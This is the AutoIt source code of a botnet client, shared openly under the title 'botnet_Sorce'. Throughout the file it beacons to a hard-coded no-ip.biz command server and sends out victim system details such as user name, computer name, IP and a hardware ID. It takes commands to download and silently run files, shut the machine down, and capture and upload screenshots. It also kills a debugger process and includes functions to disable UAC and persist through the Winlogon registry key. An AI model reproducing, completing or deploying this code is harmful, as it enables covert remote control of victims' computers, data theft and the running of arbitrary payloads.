botnet_Sorce

1. #NoTrayIcon
2. ;#RequireAdmin
3. #include <File.au3>
4. #include <Misc.au3>
5. #include <string.au3>
6. #include <crypt.au3>
7. #include <ScreenCapture.au3>
8.  
9. ;Mutex
10. ;------
11.  
12. ;Singleton("7563545689855477")
13.  
14. ;HWID
15. ;------
16.  
17. Global $hwid = id()
18.  
19. ;disable uac
20. ;------
21.  
22. if IsAdmin() Then
23.     ;_Disable_UAC()
24. EndIf
25.  
26. ;SETTING VARIABLES
27. ;------
28. $mainHome      =             "http://jlibs8080.no-ip.biz"    ;main domain
29. $mainDir      =             "/bnt2/"
30. $upshot      = $mainHome & $mainDir &    "u.php"            ;path to upload file
31. $serverHome     = $mainHome & $mainDir &    "s.php"            ;path to server file
32. $cmdDir      = $mainHome & $mainDir &    "dir.php"            ;path to commandDir file
33.  
34. ;------above = url[/]------below = local path[\]------
35. $subDir      = "\n0625d6982e9krf824\"
36. $filei      = "\jhgr78.log"            ;update log - make random VIA builder
37.  
38. ;------
39. $interv      = 5
40. $counter      = $interv * 1000 * 60            ;15 minutes
41. ;------
42.  
43. $timeInit = TimerInit()
44. Global $result
45. Global $ip     = @IPAddress1
46. ;Do On Start Up
47. ;------
48.  
49. ;FileMove(@ScriptFullPath, @TempDir & $subDir &  "hvn.exe", 9)
50.  
51. if(FileExists(@TempDir & $subDir) <> 1) Then
52.    DirCreate(@TempDir & $subDir)
53. EndIf
54.  
55. ;$reg = RegWrite('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', @ScriptName, 'REG_SZ', @TempDir & $subDir & 'hvn.exe')
56. ;_Run(@ScriptFullPath)
57.  
58. ;Anti Debugger
59. ;------
60.  
61. $process = "OLLYDBG.EXE"
62.  
63. If ProcessExists($process) Then
64.    ProcessClose($process)
65. EndIf
66.  
67. ;Initial update
68. ;------
69.  
70. _Update($filei)
71.  
72. ;UPDATE
73. ;------
74. While 1
75.    While 1
76.  
77.       $updateTime = TimerDiff($timeInit)
78.  
79.       if $updateTime > $counter Then
80.       ;ConsoleWrite("test")
81.       ;$command     = InetRead($cmdDir,1)
82.       $Command      = _Update($filei)
83.  
84.       if $command == "-1" Or StringLeft($command,3)  == "<br" Then
85.  
86.       $interv     = Random(5,30,1)
87.       $counter     = $interv * 1000 * 60
88.       $timeInit     = TimerInit()
89.       ExitLoop
90.  
91.       EndIf
92.  
93.       $process    = BinaryToString($command)
94.       $comS      = StringSplit($process,"|")
95.       $uComs     = UBound($comS) - 1
96.       Global $commandVal[$uComs+1][10]
97.  
98.       for $j = 1 to $uComs
99.  
100.       $cMas     = StringSplit($comS[$j],",")
101.       $uCmas = UBound($cMas) - 1
102.  
103.       for $l = 1 to $uCmas
104.  
105.             $commandVal[$j][$l] = $cMas[$l]
106.  
107.       Next
108.       Next
109.  
110.       $uCommandVal = UBound($commandVal)-1
111.  
112.       for $j = 1 to $uCommandVal
113.  
114.       Switch $commandval[$j][1]
115.  
116.             Case 1
117.  
118.              _DlnEx($commandval[$j][2],$commandval[$j][3],1,1,$commandval[$j][4]) ;DL n EX
119.  
120.             Case 2
121.  
122.              _DlnEx($commandval[$j][2],$commandval[$j][3],1) ;DL
123.  
124.             Case 3
125.  
126.              _DlnEx("",$commandval[$j][3],0,1,$commandval[$j][4])
127.  
128.             Case 4
129.  
130.              ;haha($commandval[$j][1])
131.              Shutdown(6)
132.  
133.             Case 5
134.  
135.              $scrnName = Random(12,999999,1) & ".jpg"
136.              _ScreenCapture_Capture(@ScriptDir & "\" & $scrnName)
137.              ScrnUp($scrnName)
138.              FileDelete(@ScriptDir & "\" & "*.jpg")
139.  
140.       EndSwitch
141.  
142.       Next
143.  
144.       ;//////---end of update---//////
145.       ;reset time
146.       ;------
147.  
148.       ;$interv     = Random(5,30,1)
149.       ;$counter     = $interv * 1000 * 60
150.       Sleep(500)
151.       $timeInit = TimerInit()
152.       EndIf
153.  
154.       Sleep(50)
155.  
156.    WEnd
157. WEnd
158. ;//////---Functions---//////
159.  
160. ;------
161. ;HWID
162.  
163. func id()
164.    $disc = StringLeft(@SystemDir, 3)
165.    $start = "0" & @CPUArch & @KBLayout & DriveGetSerial("C:\") & StringUpper(DriveGetType($disc)) & DriveSpaceTotal ($disc)
166.    $hwid1  = StringMid($start, Round(StringLen($start)/2), Round(StringLen($start)/2))
167.    $hwid2 = _StringToHex(stringReverse($hwid1))
168.    $final = $start & $hwid2
169.    $start = _Crypt_HashData($Final,$CALG_MD5)
170.    $epicFinal = StringMid($start,1,8)  & ":" &  StringMid($start,8,16)
171.  
172.    Return StringSplit($epicFinal, ":")
173. EndFunc
174.  
175. ;------
176. ;MUTEX
177.  
178. Func Singleton($semaphore)
179.     Local $ERROR_ALREADY_EXISTS = 183
180.     DllCall("kernel32.dll", "int", "CreateSemaphore", "int", 0, "long", 1, "long", 1, "str", $semaphore)
181.     Local $lastError = DllCall("kernel32.dll", "int", "GetLastError")
182.     If $lastError[0] = $ERROR_ALREADY_EXISTS Then Exit -1
183. EndFunc
184.  
185. ;------
186. ;Disable UAC
187.  
188. Func _Disable_UAC()
189.     If @OSArch = "X64" Then
190.       $pref = "64"
191.     Else
192.       $pref = ""
193.     EndIf
194.     $r1 = RegWrite("HKLM" & $pref & "\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" ,"ConsentPromptBehaviorAdmin", "REG_DWORD", "0")
195.     $r2 = RegWrite("HKLM" & $pref & "\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" ,"EnableLUA", "REG_DWORD", "0")
196.     Sleep(500)
197.     If $r1 + $r2 = 2 Then
198.       Return True
199.     Else
200.       Return False
201.     EndIf
202. EndFunc
203.  
204. ;------
205. ;StartUp
206.  
207. Func _run($file, $type = 1)
208.    $ret = False
209.    $arun = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
210.    if StringInStr($arun, @ScriptName) = 0 Then
211.       $name = @ScriptName
212.       FileCopy($file, @WindowsDir & "\" & $name, 1)
213.       $ret = RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", $arun & "," & $name)
214.    EndIf
215.    Return $ret
216. EndFunc
217.  
218. ;------
219. ;update
220.  
221. Func _Update($updateFile)
222.  
223. Global $ip     = @IPAddress1
224. $compName     = @ComputerName
225. $os      = @OSVersion
226. $userName     = @UserName
227. $Name      = $hWID[1]
228. $password    = $hwid[2]
229.  
230. $memStats = MemGetStats()
231.  
232. _FileWriteLog(@TempDir & $updateFile, "Percent memery usage - " & $memStats[0] & " # ")
233.  
234. $infoz     = FileOpen(@TempDir & $updateFile)
235. $infozz = FileRead($infoz)
236.  
237. $serverdata = '&username=' & $name & '&password=' & $password & '&os=' & $os & '&oigh=' & $infozz & '&ip=' & $ip & '&name=' & $userName & '&compName=' & $compName
238. $oHTTP = ObjCreate("winhttp.winhttprequest.5.1")
239. $oHTTP.Open("POST", $serverHome, False)
240. $oHTTP.SetRequestHeader("Content-Type","application/x-www-form-urlencoded")
241. $oHTTP.Send($serverdata)
242. $oReceived = $oHTTP.ResponseText
243. FileClose($infoz)
244.  
245. ConsoleWrite($oReceived & @CRLF)
246.  
247. FileDelete(@TempDir & $updateFile)
248. Return $oReceived
249. ;Exit
250. EndFunc
251.  
252. ;------
253. ;DL n EX
254.  
255. Func _DlnEx($DlURL="",$DlFileName="",$DwnL = 0,$DlnEx = 0,$exeParams="")
256.  
257.    $result = ""
258.  
259.       If $Dwnl == 1 Then
260.       $dlget = InetGet($DlURL,@TempDir & $subDir & $DlFileName)
261.       InetClose($dlget)
262.  
263.       If $dlget <> 0 Then
264.       $result &= "dl-succ-" & $DlFileName
265.       Else
266.       $result &= "dl-error-fail-" & $DlFileName
267.       EndIf
268.       EndIf
269.  
270.       If $DlnEx == 1 Then
271.  
272.       ShellExecute($DlFileName,$exeParams,@TempDir & $subDir,"open",@SW_HIDE)
273.       Sleep(500)
274.  
275.       $dlNexPrcExs = ProcessExists($DlFileName)
276.  
277.       If $dlNexPrcExs <> 0 Then
278.       $result &= "-exe-true-" & $DlFileName & "-pid=" & $dlNexPrcExs & "-"
279.       Else
280.       $result &= "-exe-FAIL-To-Start-" & $DlFileName
281.       EndIf
282.  
283.       EndIf
284.  
285.    _FileWriteLog(@TempDir & $filei, $result)
286.  
287. EndFunc
288.  
289. ;------
290. ;upload scrnshot
291.  
292. Func ScrnUp($scrnFile)
293.  
294. Local $picOpen      = FileOpen(@ScriptDir & "\" & $scrnFile,16)
295. Local $picRead      = FileRead($picOpen)
296. Local $boundary     = "a65h7a"             & @CRLF
297. Local $boundary2     = "--" & $boundary
298. Local $binary      = "Content-Transfer-Encoding: binary"     & @CRLF
299. local $typeCon      = "Content-Type: txt/html"             & @CRLF & @CRLF
300.  
301. Local $postData = $boundary2
302.  
303.       $postData &= 'Content-Disposition: form-data; name="file[]"; filename="' & $hwid[2] & '"' & @CRLF
304.       $postData &= $typeCon
305.       $postData &= $picRead & @CRLF
306.       $postData &= "--a65h7a--";End of HTTP HEADER
307.  
308. $oHTTP = ObjCreate("winhttp.winhttprequest.5.1")
309. $oHTTP.Open("POST", $upshot, False)
310. $oHTTP.SetRequestHeader("Content-Type", "multipart/form-data; boundary=" & $boundary)
311. $oHTTP.Send($postData)
312. $oReceived = $oHTTP.ResponseText
313.  
314. FileClose($picOpen)
315.  
316. EndFunc
317. ;------
318. ;debug Purpuses
319. func haha($var)
320.  
321. ConsoleWrite("haha it worked" & @CRLF)
322. ConsoleWrite($var & @CRLF)
323.  
324. EndFunc